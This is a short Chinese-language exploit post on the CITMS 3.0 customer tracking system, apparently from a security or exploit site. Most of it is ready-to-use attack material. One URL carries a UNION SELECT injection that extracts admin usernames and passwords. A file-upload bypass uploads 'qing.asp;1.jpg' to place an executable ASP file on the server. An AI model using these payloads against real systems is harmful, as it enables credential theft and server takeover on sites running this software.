公司客户信息与追踪管理系统CITMS 3.0 注入and上传漏洞
管理系统部分功能如下:
(1)在线增加、修改、删除管理员
(2)在线增加、修改、删除客户记录、支持HTML等..
(3)前台记录有追踪功能..以及追踪记录和点击次数显示
源码下载:
http://www.mycodes.net/30/5238.htm
注入:
http://www.xxx.com/citms3.0/list.asp?id=1320 union select 1,name,3,pass,5,6,7,8,9,10,11,12,13,14,15,16 from admin
上传
http://www.xxx.com/soft/demo/citms3.0/upload_pic.asp
上传qing.asp;1.jpg 成功后得到:qing.asp;随机数.jpg
如:upload/201209220914105021.jpg
下一篇:PHP的XSS攻击过滤函数